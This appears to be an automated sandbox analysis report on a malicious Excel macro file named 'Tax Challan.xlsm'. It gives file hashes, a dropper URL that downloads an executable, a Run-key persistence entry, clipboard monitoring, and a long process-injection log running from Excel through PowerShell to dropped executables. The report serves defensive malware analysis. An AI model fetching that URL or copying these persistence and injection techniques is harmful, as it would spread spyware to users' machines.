5f005ef79f2a337aa3e3537f304316bdb931dffa3cecacadc1cd094c1414bf4f

Analysis

max time kernel
150s
max time network
144s
platform
windows10_x64
resource
win10v200430
submitted
16-07-2020 07:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Tax Challan.xlsm
Size

88KB
MD5

8927ad6be7ff24a708641467b7f699d5
SHA1

9973dad26ac516f3a4f413624fa908a828e5df9b
SHA256

5f005ef79f2a337aa3e3537f304316bdb931dffa3cecacadc1cd094c1414bf4f
SHA512

fa5d459357e53bdf963126d3f0fa7fc840a6bb62448807f9ee8e38e65a58d0f9f00c0bdefcb0df3a6186843e80e9870df2c7ae455fbb623dfc92264e5dddea34

Score

10^/10

persistence spyware

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://jurec.mx/doc.exe

Signatures

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1000	2328	WerFault.exe	82

Loads dropped DLL 6 IoCs

pid	Process
1836	images.exe
1836	images.exe
1836	images.exe
1836	images.exe
1836	images.exe
1836	images.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Images = "C:\\ProgramData\\images.exe"	LkAnJ.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\ProgramData:ApplicationData	LkAnJ.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2804	EXCEL.EXE

Suspicious use of WriteProcessMemory 813 IoCs

description	pid	Process	procid_target
PID 2804 wrote to memory of 3860	2804	EXCEL.EXE	72
PID 2804 wrote to memory of 3860	2804	EXCEL.EXE	72
PID 3860 wrote to memory of 3820	3860	cmd.exe	74
PID 3860 wrote to memory of 3820	3860	cmd.exe	74
PID 3820 wrote to memory of 3312	3820	powershell.exe	77
PID 3820 wrote to memory of 3312	3820	powershell.exe	77
PID 3820 wrote to memory of 3312	3820	powershell.exe	77
PID 3312 wrote to memory of 3832	3312	LkAnJ.exe	79
PID 3312 wrote to memory of 3832	3312	LkAnJ.exe	79
PID 3312 wrote to memory of 3832	3312	LkAnJ.exe	79
PID 3312 wrote to memory of 3832	3312	LkAnJ.exe	79
PID 3312 wrote to memory of 3832	3312	LkAnJ.exe	79
PID 3312 wrote to memory of 812	3312	LkAnJ.exe	80
PID 3312 wrote to memory of 812	3312	LkAnJ.exe	80
PID 3312 wrote to memory of 812	3312	LkAnJ.exe	80
PID 3312 wrote to memory of 1072	3312	LkAnJ.exe	81
PID 3312 wrote to memory of 1072	3312	LkAnJ.exe	81
PID 3312 wrote to memory of 1072	3312	LkAnJ.exe	81
PID 812 wrote to memory of 2328	812	LkAnJ.exe	82
PID 812 wrote to memory of 2328	812	LkAnJ.exe	82
PID 812 wrote to memory of 2328	812	LkAnJ.exe	82
PID 812 wrote to memory of 2220	812	LkAnJ.exe	84
PID 812 wrote to memory of 2220	812	LkAnJ.exe	84
PID 812 wrote to memory of 2220	812	LkAnJ.exe	84
PID 2220 wrote to memory of 3804	2220	images.exe	85
PID 2220 wrote to memory of 3804	2220	images.exe	85
PID 2220 wrote to memory of 3804	2220	images.exe	85
PID 2220 wrote to memory of 3804	2220	images.exe	85
PID 2220 wrote to memory of 3804	2220	images.exe	85
PID 2220 wrote to memory of 1836	2220	images.exe	86
PID 2220 wrote to memory of 1836	2220	images.exe	86
PID 2220 wrote to memory of 1836	2220	images.exe	86
PID 1072 wrote to memory of 3336	1072	LkAnJ.exe	87
PID 1072 wrote to memory of 3336	1072	LkAnJ.exe	87
PID 1072 wrote to memory of 3336	1072	LkAnJ.exe	87
PID 2220 wrote to memory of 3640	2220	images.exe	88
PID 2220 wrote to memory of 3640	2220	images.exe	88
PID 2220 wrote to memory of 3640	2220	images.exe	88
PID 3336 wrote to memory of 728	3336	LkAnJ.exe	89
PID 3336 wrote to memory of 728	3336	LkAnJ.exe	89
PID 3336 wrote to memory of 728	3336	LkAnJ.exe	89
PID 3336 wrote to memory of 728	3336	LkAnJ.exe	89
PID 3336 wrote to memory of 728	3336	LkAnJ.exe	89
PID 3336 wrote to memory of 3880	3336	LkAnJ.exe	90
PID 3336 wrote to memory of 3880	3336	LkAnJ.exe	90
PID 3336 wrote to memory of 3880	3336	LkAnJ.exe	90
PID 3336 wrote to memory of 3136	3336	LkAnJ.exe	91
PID 3336 wrote to memory of 3136	3336	LkAnJ.exe	91
PID 3336 wrote to memory of 3136	3336	LkAnJ.exe	91
PID 3136 wrote to memory of 3484	3136	LkAnJ.exe	94
PID 3136 wrote to memory of 3484	3136	LkAnJ.exe	94
PID 3136 wrote to memory of 3484	3136	LkAnJ.exe	94
PID 3484 wrote to memory of 3084	3484	LkAnJ.exe	95
PID 3484 wrote to memory of 3084	3484	LkAnJ.exe	95
PID 3484 wrote to memory of 3084	3484	LkAnJ.exe	95
PID 3484 wrote to memory of 3084	3484	LkAnJ.exe	95
PID 3484 wrote to memory of 3084	3484	LkAnJ.exe	95
PID 3484 wrote to memory of 1872	3484	LkAnJ.exe	96
PID 3484 wrote to memory of 1872	3484	LkAnJ.exe	96
PID 3484 wrote to memory of 1872	3484	LkAnJ.exe	96
PID 3484 wrote to memory of 3356	3484	LkAnJ.exe	97
PID 3484 wrote to memory of 3356	3484	LkAnJ.exe	97
PID 3484 wrote to memory of 3356	3484	LkAnJ.exe	97
PID 1836 wrote to memory of 2208	1836	images.exe	98
PID 1836 wrote to memory of 2208	1836	images.exe	98
PID 1836 wrote to memory of 2208	1836	images.exe	98
PID 1836 wrote to memory of 3180	1836	images.exe	100
PID 1836 wrote to memory of 3180	1836	images.exe	100
PID 1836 wrote to memory of 3180	1836	images.exe	100
PID 1836 wrote to memory of 3180	1836	images.exe	100
PID 1836 wrote to memory of 3180	1836	images.exe	100
PID 3356 wrote to memory of 4120	3356	LkAnJ.exe	103
PID 3356 wrote to memory of 4120	3356	LkAnJ.exe	103
PID 3356 wrote to memory of 4120	3356	LkAnJ.exe	103
PID 4120 wrote to memory of 4168	4120	LkAnJ.exe	104
PID 4120 wrote to memory of 4168	4120	LkAnJ.exe	104
PID 4120 wrote to memory of 4168	4120	LkAnJ.exe	104
PID 4120 wrote to memory of 4168	4120	LkAnJ.exe	104
PID 4120 wrote to memory of 4168	4120	LkAnJ.exe	104
PID 4120 wrote to memory of 4184	4120	LkAnJ.exe	105
PID 4120 wrote to memory of 4184	4120	LkAnJ.exe	105
PID 4120 wrote to memory of 4184	4120	LkAnJ.exe	105
PID 4120 wrote to memory of 4224	4120	LkAnJ.exe	106
PID 4120 wrote to memory of 4224	4120	LkAnJ.exe	106
PID 4120 wrote to memory of 4224	4120	LkAnJ.exe	106
PID 4224 wrote to memory of 4400	4224	LkAnJ.exe	107
PID 4224 wrote to memory of 4400	4224	LkAnJ.exe	107
PID 4224 wrote to memory of 4400	4224	LkAnJ.exe	107
PID 4400 wrote to memory of 4428	4400	LkAnJ.exe	108
PID 4400 wrote to memory of 4428	4400	LkAnJ.exe	108
PID 4400 wrote to memory of 4428	4400	LkAnJ.exe	108
PID 4400 wrote to memory of 4428	4400	LkAnJ.exe	108
PID 4400 wrote to memory of 4428	4400	LkAnJ.exe	108
PID 4400 wrote to memory of 4440	4400	LkAnJ.exe	109
PID 4400 wrote to memory of 4440	4400	LkAnJ.exe	109
PID 4400 wrote to memory of 4440	4400	LkAnJ.exe	109
PID 4400 wrote to memory of 4480	4400	LkAnJ.exe	110
PID 4400 wrote to memory of 4480	4400	LkAnJ.exe	110
PID 4400 wrote to memory of 4480	4400	LkAnJ.exe	110
PID 4480 wrote to memory of 4584	4480	LkAnJ.exe	111
PID 4480 wrote to memory of 4584	4480	LkAnJ.exe	111
PID 4480 wrote to memory of 4584	4480	LkAnJ.exe	111
PID 4584 wrote to memory of 4616	4584	LkAnJ.exe	112
PID 4584 wrote to memory of 4616	4584	LkAnJ.exe	112
PID 4584 wrote to memory of 4616	4584	LkAnJ.exe	112
PID 4584 wrote to memory of 4616	4584	LkAnJ.exe	112
PID 4584 wrote to memory of 4616	4584	LkAnJ.exe	112
PID 4584 wrote to memory of 4628	4584	LkAnJ.exe	113
PID 4584 wrote to memory of 4628	4584	LkAnJ.exe	113
PID 4584 wrote to memory of 4628	4584	LkAnJ.exe	113
PID 4584 wrote to memory of 4664	4584	LkAnJ.exe	114
PID 4584 wrote to memory of 4664	4584	LkAnJ.exe	114
PID 4584 wrote to memory of 4664	4584	LkAnJ.exe	114
PID 4664 wrote to memory of 4708	4664	LkAnJ.exe	115
PID 4664 wrote to memory of 4708	4664	LkAnJ.exe	115
PID 4664 wrote to memory of 4708	4664	LkAnJ.exe	115
PID 4708 wrote to memory of 4736	4708	LkAnJ.exe	116
PID 4708 wrote to memory of 4736	4708	LkAnJ.exe	116
PID 4708 wrote to memory of 4736	4708	LkAnJ.exe	116
PID 4708 wrote to memory of 4736	4708	LkAnJ.exe	116
PID 4708 wrote to memory of 4736	4708	LkAnJ.exe	116
PID 4708 wrote to memory of 4748	4708	LkAnJ.exe	117
PID 4708 wrote to memory of 4748	4708	LkAnJ.exe	117
PID 4708 wrote to memory of 4748	4708	LkAnJ.exe	117
PID 4708 wrote to memory of 4776	4708	LkAnJ.exe	118
PID 4708 wrote to memory of 4776	4708	LkAnJ.exe	118
PID 4708 wrote to memory of 4776	4708	LkAnJ.exe	118
PID 4776 wrote to memory of 4820	4776	LkAnJ.exe	119
PID 4776 wrote to memory of 4820	4776	LkAnJ.exe	119
PID 4776 wrote to memory of 4820	4776	LkAnJ.exe	119
PID 4820 wrote to memory of 4848	4820	LkAnJ.exe	120
PID 4820 wrote to memory of 4848	4820	LkAnJ.exe	120
PID 4820 wrote to memory of 4848	4820	LkAnJ.exe	120
PID 4820 wrote to memory of 4848	4820	LkAnJ.exe	120
PID 4820 wrote to memory of 4848	4820	LkAnJ.exe	120
PID 4820 wrote to memory of 4860	4820	LkAnJ.exe	121
PID 4820 wrote to memory of 4860	4820	LkAnJ.exe	121
PID 4820 wrote to memory of 4860	4820	LkAnJ.exe	121
PID 4820 wrote to memory of 4888	4820	LkAnJ.exe	122
PID 4820 wrote to memory of 4888	4820	LkAnJ.exe	122
PID 4820 wrote to memory of 4888	4820	LkAnJ.exe	122
PID 4888 wrote to memory of 4928	4888	LkAnJ.exe	123
PID 4888 wrote to memory of 4928	4888	LkAnJ.exe	123
PID 4888 wrote to memory of 4928	4888	LkAnJ.exe	123
PID 4928 wrote to memory of 4956	4928	LkAnJ.exe	124
PID 4928 wrote to memory of 4956	4928	LkAnJ.exe	124
PID 4928 wrote to memory of 4956	4928	LkAnJ.exe	124
PID 4928 wrote to memory of 4956	4928	LkAnJ.exe	124
PID 4928 wrote to memory of 4956	4928	LkAnJ.exe	124
PID 4928 wrote to memory of 4968	4928	LkAnJ.exe	125
PID 4928 wrote to memory of 4968	4928	LkAnJ.exe	125
PID 4928 wrote to memory of 4968	4928	LkAnJ.exe	125
PID 4928 wrote to memory of 5000	4928	LkAnJ.exe	126
PID 4928 wrote to memory of 5000	4928	LkAnJ.exe	126
PID 4928 wrote to memory of 5000	4928	LkAnJ.exe	126
PID 5000 wrote to memory of 5040	5000	LkAnJ.exe	127
PID 5000 wrote to memory of 5040	5000	LkAnJ.exe	127
PID 5000 wrote to memory of 5040	5000	LkAnJ.exe	127
PID 5040 wrote to memory of 5068	5040	LkAnJ.exe	128
PID 5040 wrote to memory of 5068	5040	LkAnJ.exe	128
PID 5040 wrote to memory of 5068	5040	LkAnJ.exe	128
PID 5040 wrote to memory of 5068	5040	LkAnJ.exe	128
PID 5040 wrote to memory of 5068	5040	LkAnJ.exe	128
PID 5040 wrote to memory of 5080	5040	LkAnJ.exe	129
PID 5040 wrote to memory of 5080	5040	LkAnJ.exe	129
PID 5040 wrote to memory of 5080	5040	LkAnJ.exe	129
PID 5040 wrote to memory of 5108	5040	LkAnJ.exe	130
PID 5040 wrote to memory of 5108	5040	LkAnJ.exe	130
PID 5040 wrote to memory of 5108	5040	LkAnJ.exe	130
PID 5108 wrote to memory of 4112	5108	LkAnJ.exe	131
PID 5108 wrote to memory of 4112	5108	LkAnJ.exe	131
PID 5108 wrote to memory of 4112	5108	LkAnJ.exe	131
PID 4112 wrote to memory of 4144	4112	LkAnJ.exe	132
PID 4112 wrote to memory of 4144	4112	LkAnJ.exe	132
PID 4112 wrote to memory of 4144	4112	LkAnJ.exe	132
PID 4112 wrote to memory of 4144	4112	LkAnJ.exe	132
PID 4112 wrote to memory of 4144	4112	LkAnJ.exe	132
PID 4112 wrote to memory of 4196	4112	LkAnJ.exe	133
PID 4112 wrote to memory of 4196	4112	LkAnJ.exe	133
PID 4112 wrote to memory of 4196	4112	LkAnJ.exe	133
PID 4112 wrote to memory of 4172	4112	LkAnJ.exe	134
PID 4112 wrote to memory of 4172	4112	LkAnJ.exe	134
PID 4112 wrote to memory of 4172	4112	LkAnJ.exe	134
PID 4172 wrote to memory of 4168	4172	LkAnJ.exe	135
PID 4172 wrote to memory of 4168	4172	LkAnJ.exe	135
PID 4172 wrote to memory of 4168	4172	LkAnJ.exe	135
PID 4168 wrote to memory of 4280	4168	LkAnJ.exe	136
PID 4168 wrote to memory of 4280	4168	LkAnJ.exe	136
PID 4168 wrote to memory of 4280	4168	LkAnJ.exe	136
PID 4168 wrote to memory of 4280	4168	LkAnJ.exe	136
PID 4168 wrote to memory of 4280	4168	LkAnJ.exe	136
PID 4168 wrote to memory of 4296	4168	LkAnJ.exe	137
PID 4168 wrote to memory of 4296	4168	LkAnJ.exe	137
PID 4168 wrote to memory of 4296	4168	LkAnJ.exe	137
PID 4168 wrote to memory of 4328	4168	LkAnJ.exe	138
PID 4168 wrote to memory of 4328	4168	LkAnJ.exe	138
PID 4168 wrote to memory of 4328	4168	LkAnJ.exe	138
PID 4328 wrote to memory of 1544	4328	LkAnJ.exe	139
PID 4328 wrote to memory of 1544	4328	LkAnJ.exe	139
PID 4328 wrote to memory of 1544	4328	LkAnJ.exe	139
PID 1544 wrote to memory of 3692	1544	LkAnJ.exe	140
PID 1544 wrote to memory of 3692	1544	LkAnJ.exe	140
PID 1544 wrote to memory of 3692	1544	LkAnJ.exe	140
PID 1544 wrote to memory of 3692	1544	LkAnJ.exe	140
PID 1544 wrote to memory of 3692	1544	LkAnJ.exe	140
PID 1544 wrote to memory of 2264	1544	LkAnJ.exe	141
PID 1544 wrote to memory of 2264	1544	LkAnJ.exe	141
PID 1544 wrote to memory of 2264	1544	LkAnJ.exe	141
PID 1544 wrote to memory of 4188	1544	LkAnJ.exe	142
PID 1544 wrote to memory of 4188	1544	LkAnJ.exe	142
PID 1544 wrote to memory of 4188	1544	LkAnJ.exe	142
PID 4188 wrote to memory of 4456	4188	LkAnJ.exe	143
PID 4188 wrote to memory of 4456	4188	LkAnJ.exe	143
PID 4188 wrote to memory of 4456	4188	LkAnJ.exe	143
PID 4456 wrote to memory of 4496	4456	LkAnJ.exe	144
PID 4456 wrote to memory of 4496	4456	LkAnJ.exe	144
PID 4456 wrote to memory of 4496	4456	LkAnJ.exe	144
PID 4456 wrote to memory of 4496	4456	LkAnJ.exe	144
PID 4456 wrote to memory of 4496	4456	LkAnJ.exe	144
PID 4456 wrote to memory of 4392	4456	LkAnJ.exe	145
PID 4456 wrote to memory of 4392	4456	LkAnJ.exe	145
PID 4456 wrote to memory of 4392	4456	LkAnJ.exe	145
PID 4456 wrote to memory of 4060	4456	LkAnJ.exe	146
PID 4456 wrote to memory of 4060	4456	LkAnJ.exe	146
PID 4456 wrote to memory of 4060	4456	LkAnJ.exe	146
PID 4060 wrote to memory of 2768	4060	LkAnJ.exe	147
PID 4060 wrote to memory of 2768	4060	LkAnJ.exe	147
PID 4060 wrote to memory of 2768	4060	LkAnJ.exe	147
PID 2768 wrote to memory of 3440	2768	LkAnJ.exe	148
PID 2768 wrote to memory of 3440	2768	LkAnJ.exe	148
PID 2768 wrote to memory of 3440	2768	LkAnJ.exe	148
PID 2768 wrote to memory of 3440	2768	LkAnJ.exe	148
PID 2768 wrote to memory of 3440	2768	LkAnJ.exe	148
PID 2768 wrote to memory of 632	2768	LkAnJ.exe	149
PID 2768 wrote to memory of 632	2768	LkAnJ.exe	149
PID 2768 wrote to memory of 632	2768	LkAnJ.exe	149
PID 2768 wrote to memory of 1008	2768	LkAnJ.exe	150
PID 2768 wrote to memory of 1008	2768	LkAnJ.exe	150
PID 2768 wrote to memory of 1008	2768	LkAnJ.exe	150
PID 1008 wrote to memory of 3380	1008	LkAnJ.exe	151
PID 1008 wrote to memory of 3380	1008	LkAnJ.exe	151
PID 1008 wrote to memory of 3380	1008	LkAnJ.exe	151
PID 3380 wrote to memory of 3576	3380	LkAnJ.exe	152
PID 3380 wrote to memory of 3576	3380	LkAnJ.exe	152
PID 3380 wrote to memory of 3576	3380	LkAnJ.exe	152
PID 3380 wrote to memory of 3576	3380	LkAnJ.exe	152
PID 3380 wrote to memory of 3576	3380	LkAnJ.exe	152
PID 3380 wrote to memory of 408	3380	LkAnJ.exe	153
PID 3380 wrote to memory of 408	3380	LkAnJ.exe	153
PID 3380 wrote to memory of 408	3380	LkAnJ.exe	153
PID 3380 wrote to memory of 3880	3380	LkAnJ.exe	154
PID 3380 wrote to memory of 3880	3380	LkAnJ.exe	154
PID 3380 wrote to memory of 3880	3380	LkAnJ.exe	154
PID 3880 wrote to memory of 2080	3880	LkAnJ.exe	155
PID 3880 wrote to memory of 2080	3880	LkAnJ.exe	155
PID 3880 wrote to memory of 2080	3880	LkAnJ.exe	155
PID 2080 wrote to memory of 3788	2080	LkAnJ.exe	156
PID 2080 wrote to memory of 3788	2080	LkAnJ.exe	156
PID 2080 wrote to memory of 3788	2080	LkAnJ.exe	156
PID 2080 wrote to memory of 3788	2080	LkAnJ.exe	156
PID 2080 wrote to memory of 3788	2080	LkAnJ.exe	156
PID 2080 wrote to memory of 4472	2080	LkAnJ.exe	157
PID 2080 wrote to memory of 4472	2080	LkAnJ.exe	157
PID 2080 wrote to memory of 4472	2080	LkAnJ.exe	157
PID 2080 wrote to memory of 4592	2080	LkAnJ.exe	158
PID 2080 wrote to memory of 4592	2080	LkAnJ.exe	158
PID 2080 wrote to memory of 4592	2080	LkAnJ.exe	158
PID 4592 wrote to memory of 4620	4592	LkAnJ.exe	159
PID 4592 wrote to memory of 4620	4592	LkAnJ.exe	159
PID 4592 wrote to memory of 4620	4592	LkAnJ.exe	159
PID 4620 wrote to memory of 4652	4620	LkAnJ.exe	160
PID 4620 wrote to memory of 4652	4620	LkAnJ.exe	160
PID 4620 wrote to memory of 4652	4620	LkAnJ.exe	160
PID 4620 wrote to memory of 4652	4620	LkAnJ.exe	160
PID 4620 wrote to memory of 4652	4620	LkAnJ.exe	160
PID 4620 wrote to memory of 1728	4620	LkAnJ.exe	161
PID 4620 wrote to memory of 1728	4620	LkAnJ.exe	161
PID 4620 wrote to memory of 1728	4620	LkAnJ.exe	161
PID 4620 wrote to memory of 4692	4620	LkAnJ.exe	162
PID 4620 wrote to memory of 4692	4620	LkAnJ.exe	162
PID 4620 wrote to memory of 4692	4620	LkAnJ.exe	162
PID 4692 wrote to memory of 4728	4692	LkAnJ.exe	163
PID 4692 wrote to memory of 4728	4692	LkAnJ.exe	163
PID 4692 wrote to memory of 4728	4692	LkAnJ.exe	163
PID 4728 wrote to memory of 4800	4728	LkAnJ.exe	164
PID 4728 wrote to memory of 4800	4728	LkAnJ.exe	164
PID 4728 wrote to memory of 4800	4728	LkAnJ.exe	164
PID 4728 wrote to memory of 4800	4728	LkAnJ.exe	164
PID 4728 wrote to memory of 4800	4728	LkAnJ.exe	164
PID 4728 wrote to memory of 4804	4728	LkAnJ.exe	165
PID 4728 wrote to memory of 4804	4728	LkAnJ.exe	165
PID 4728 wrote to memory of 4804	4728	LkAnJ.exe	165
PID 4728 wrote to memory of 4808	4728	LkAnJ.exe	166
PID 4728 wrote to memory of 4808	4728	LkAnJ.exe	166
PID 4728 wrote to memory of 4808	4728	LkAnJ.exe	166
PID 4808 wrote to memory of 4844	4808	LkAnJ.exe	167
PID 4808 wrote to memory of 4844	4808	LkAnJ.exe	167
PID 4808 wrote to memory of 4844	4808	LkAnJ.exe	167
PID 4844 wrote to memory of 4896	4844	LkAnJ.exe	168
PID 4844 wrote to memory of 4896	4844	LkAnJ.exe	168
PID 4844 wrote to memory of 4896	4844	LkAnJ.exe	168
PID 4844 wrote to memory of 4896	4844	LkAnJ.exe	168
PID 4844 wrote to memory of 4896	4844	LkAnJ.exe	168
PID 4844 wrote to memory of 4880	4844	LkAnJ.exe	169
PID 4844 wrote to memory of 4880	4844	LkAnJ.exe	169
PID 4844 wrote to memory of 4880	4844	LkAnJ.exe	169
PID 4844 wrote to memory of 4916	4844	LkAnJ.exe	170
PID 4844 wrote to memory of 4916	4844	LkAnJ.exe	170
PID 4844 wrote to memory of 4916	4844	LkAnJ.exe	170
PID 4916 wrote to memory of 4932	4916	LkAnJ.exe	171
PID 4916 wrote to memory of 4932	4916	LkAnJ.exe	171
PID 4916 wrote to memory of 4932	4916	LkAnJ.exe	171
PID 4932 wrote to memory of 5008	4932	LkAnJ.exe	172
PID 4932 wrote to memory of 5008	4932	LkAnJ.exe	172
PID 4932 wrote to memory of 5008	4932	LkAnJ.exe	172
PID 4932 wrote to memory of 5008	4932	LkAnJ.exe	172
PID 4932 wrote to memory of 5008	4932	LkAnJ.exe	172
PID 4932 wrote to memory of 5020	4932	LkAnJ.exe	173
PID 4932 wrote to memory of 5020	4932	LkAnJ.exe	173
PID 4932 wrote to memory of 5020	4932	LkAnJ.exe	173
PID 4932 wrote to memory of 1364	4932	LkAnJ.exe	174
PID 4932 wrote to memory of 1364	4932	LkAnJ.exe	174
PID 4932 wrote to memory of 1364	4932	LkAnJ.exe	174
PID 1364 wrote to memory of 3668	1364	LkAnJ.exe	175
PID 1364 wrote to memory of 3668	1364	LkAnJ.exe	175
PID 1364 wrote to memory of 3668	1364	LkAnJ.exe	175
PID 3668 wrote to memory of 4024	3668	LkAnJ.exe	176
PID 3668 wrote to memory of 4024	3668	LkAnJ.exe	176
PID 3668 wrote to memory of 4024	3668	LkAnJ.exe	176
PID 3668 wrote to memory of 4024	3668	LkAnJ.exe	176
PID 3668 wrote to memory of 4024	3668	LkAnJ.exe	176
PID 3668 wrote to memory of 4996	3668	LkAnJ.exe	177
PID 3668 wrote to memory of 4996	3668	LkAnJ.exe	177
PID 3668 wrote to memory of 4996	3668	LkAnJ.exe	177
PID 3668 wrote to memory of 5004	3668	LkAnJ.exe	178
PID 3668 wrote to memory of 5004	3668	LkAnJ.exe	178
PID 3668 wrote to memory of 5004	3668	LkAnJ.exe	178
PID 5004 wrote to memory of 5040	5004	LkAnJ.exe	179
PID 5004 wrote to memory of 5040	5004	LkAnJ.exe	179
PID 5004 wrote to memory of 5040	5004	LkAnJ.exe	179
PID 5040 wrote to memory of 5068	5040	LkAnJ.exe	180
PID 5040 wrote to memory of 5068	5040	LkAnJ.exe	180
PID 5040 wrote to memory of 5068	5040	LkAnJ.exe	180
PID 5040 wrote to memory of 5068	5040	LkAnJ.exe	180
PID 5040 wrote to memory of 5068	5040	LkAnJ.exe	180
PID 5040 wrote to memory of 3644	5040	LkAnJ.exe	181
PID 5040 wrote to memory of 3644	5040	LkAnJ.exe	181
PID 5040 wrote to memory of 3644	5040	LkAnJ.exe	181
PID 5040 wrote to memory of 5108	5040	LkAnJ.exe	182
PID 5040 wrote to memory of 5108	5040	LkAnJ.exe	182
PID 5040 wrote to memory of 5108	5040	LkAnJ.exe	182
PID 5108 wrote to memory of 4124	5108	LkAnJ.exe	183
PID 5108 wrote to memory of 4124	5108	LkAnJ.exe	183
PID 5108 wrote to memory of 4124	5108	LkAnJ.exe	183
PID 4124 wrote to memory of 4140	4124	LkAnJ.exe	184
PID 4124 wrote to memory of 4140	4124	LkAnJ.exe	184
PID 4124 wrote to memory of 4140	4124	LkAnJ.exe	184
PID 4124 wrote to memory of 4140	4124	LkAnJ.exe	184
PID 4124 wrote to memory of 4140	4124	LkAnJ.exe	184
PID 4124 wrote to memory of 4180	4124	LkAnJ.exe	185
PID 4124 wrote to memory of 4180	4124	LkAnJ.exe	185
PID 4124 wrote to memory of 4180	4124	LkAnJ.exe	185
PID 4124 wrote to memory of 4264	4124	LkAnJ.exe	186
PID 4124 wrote to memory of 4264	4124	LkAnJ.exe	186
PID 4124 wrote to memory of 4264	4124	LkAnJ.exe	186
PID 4264 wrote to memory of 4256	4264	LkAnJ.exe	187
PID 4264 wrote to memory of 4256	4264	LkAnJ.exe	187
PID 4264 wrote to memory of 4256	4264	LkAnJ.exe	187
PID 4256 wrote to memory of 4348	4256	LkAnJ.exe	188
PID 4256 wrote to memory of 4348	4256	LkAnJ.exe	188
PID 4256 wrote to memory of 4348	4256	LkAnJ.exe	188
PID 4256 wrote to memory of 4348	4256	LkAnJ.exe	188
PID 4256 wrote to memory of 4348	4256	LkAnJ.exe	188
PID 4256 wrote to memory of 820	4256	LkAnJ.exe	189
PID 4256 wrote to memory of 820	4256	LkAnJ.exe	189
PID 4256 wrote to memory of 820	4256	LkAnJ.exe	189
PID 4256 wrote to memory of 4356	4256	LkAnJ.exe	190
PID 4256 wrote to memory of 4356	4256	LkAnJ.exe	190
PID 4256 wrote to memory of 4356	4256	LkAnJ.exe	190
PID 4356 wrote to memory of 3648	4356	LkAnJ.exe	191
PID 4356 wrote to memory of 3648	4356	LkAnJ.exe	191
PID 4356 wrote to memory of 3648	4356	LkAnJ.exe	191
PID 3648 wrote to memory of 4004	3648	LkAnJ.exe	192
PID 3648 wrote to memory of 4004	3648	LkAnJ.exe	192
PID 3648 wrote to memory of 4004	3648	LkAnJ.exe	192
PID 3648 wrote to memory of 4004	3648	LkAnJ.exe	192
PID 3648 wrote to memory of 4004	3648	LkAnJ.exe	192
PID 3648 wrote to memory of 3444	3648	LkAnJ.exe	193
PID 3648 wrote to memory of 3444	3648	LkAnJ.exe	193
PID 3648 wrote to memory of 3444	3648	LkAnJ.exe	193
PID 3648 wrote to memory of 4416	3648	LkAnJ.exe	194
PID 3648 wrote to memory of 4416	3648	LkAnJ.exe	194
PID 3648 wrote to memory of 4416	3648	LkAnJ.exe	194
PID 4416 wrote to memory of 4188	4416	LkAnJ.exe	195
PID 4416 wrote to memory of 4188	4416	LkAnJ.exe	195
PID 4416 wrote to memory of 4188	4416	LkAnJ.exe	195
PID 4188 wrote to memory of 4428	4188	LkAnJ.exe	196
PID 4188 wrote to memory of 4428	4188	LkAnJ.exe	196
PID 4188 wrote to memory of 4428	4188	LkAnJ.exe	196
PID 4188 wrote to memory of 4428	4188	LkAnJ.exe	196
PID 4188 wrote to memory of 4428	4188	LkAnJ.exe	196
PID 4188 wrote to memory of 1776	4188	LkAnJ.exe	197
PID 4188 wrote to memory of 1776	4188	LkAnJ.exe	197
PID 4188 wrote to memory of 1776	4188	LkAnJ.exe	197
PID 4188 wrote to memory of 1796	4188	LkAnJ.exe	198
PID 4188 wrote to memory of 1796	4188	LkAnJ.exe	198
PID 4188 wrote to memory of 1796	4188	LkAnJ.exe	198
PID 1796 wrote to memory of 3924	1796	LkAnJ.exe	199
PID 1796 wrote to memory of 3924	1796	LkAnJ.exe	199
PID 1796 wrote to memory of 3924	1796	LkAnJ.exe	199
PID 3924 wrote to memory of 492	3924	LkAnJ.exe	200
PID 3924 wrote to memory of 492	3924	LkAnJ.exe	200
PID 3924 wrote to memory of 492	3924	LkAnJ.exe	200
PID 3924 wrote to memory of 492	3924	LkAnJ.exe	200
PID 3924 wrote to memory of 492	3924	LkAnJ.exe	200
PID 3924 wrote to memory of 3440	3924	LkAnJ.exe	201
PID 3924 wrote to memory of 3440	3924	LkAnJ.exe	201
PID 3924 wrote to memory of 3440	3924	LkAnJ.exe	201
PID 3924 wrote to memory of 504	3924	LkAnJ.exe	202
PID 3924 wrote to memory of 504	3924	LkAnJ.exe	202
PID 3924 wrote to memory of 504	3924	LkAnJ.exe	202
PID 504 wrote to memory of 1008	504	LkAnJ.exe	203
PID 504 wrote to memory of 1008	504	LkAnJ.exe	203
PID 504 wrote to memory of 1008	504	LkAnJ.exe	203
PID 1008 wrote to memory of 1252	1008	LkAnJ.exe	204
PID 1008 wrote to memory of 1252	1008	LkAnJ.exe	204
PID 1008 wrote to memory of 1252	1008	LkAnJ.exe	204
PID 1008 wrote to memory of 1252	1008	LkAnJ.exe	204
PID 1008 wrote to memory of 1252	1008	LkAnJ.exe	204
PID 1008 wrote to memory of 1308	1008	LkAnJ.exe	205
PID 1008 wrote to memory of 1308	1008	LkAnJ.exe	205
PID 1008 wrote to memory of 1308	1008	LkAnJ.exe	205
PID 1008 wrote to memory of 1296	1008	LkAnJ.exe	206
PID 1008 wrote to memory of 1296	1008	LkAnJ.exe	206
PID 1008 wrote to memory of 1296	1008	LkAnJ.exe	206
PID 1296 wrote to memory of 3340	1296	LkAnJ.exe	207
PID 1296 wrote to memory of 3340	1296	LkAnJ.exe	207
PID 1296 wrote to memory of 3340	1296	LkAnJ.exe	207
PID 3340 wrote to memory of 2188	3340	LkAnJ.exe	208
PID 3340 wrote to memory of 2188	3340	LkAnJ.exe	208
